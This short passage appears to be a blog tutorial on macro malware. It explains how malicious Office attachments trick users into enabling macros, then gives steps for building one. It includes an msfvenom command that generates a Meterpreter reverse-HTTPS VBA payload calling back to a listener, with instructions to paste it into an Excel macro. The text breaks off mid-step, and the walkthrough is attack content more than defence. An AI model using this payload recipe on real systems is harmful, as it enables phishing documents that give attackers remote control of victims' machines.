How macro malware works Macro malware hides in Microsoft Office files and are delivered as email attachments or inside ZIP files. These files use names that are intended to entice or scare people into opening them. They often look like invoices, receipts, legal documents, and more. Macro malware was fairly common several years ago because macros ran automatically whenever a document was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware authors need to convince users to turn on macros so that their malware can run. They do this by showing fake warnings when a malicious document is opened. Prerequisite: Metasploit Module Windows 10 Microsoft Office STEP 1: Generating payload (VBS) - Open terminal in kali and execute the following command: - msfvenom -p windows/meterpreter/reverse_https lhost=192.168.43.138 lport=1234 -f vba STEP 2: Create a new excel file and open Macros Setting. Copy and paste the code generated(msfveno...
Attack is the best defence.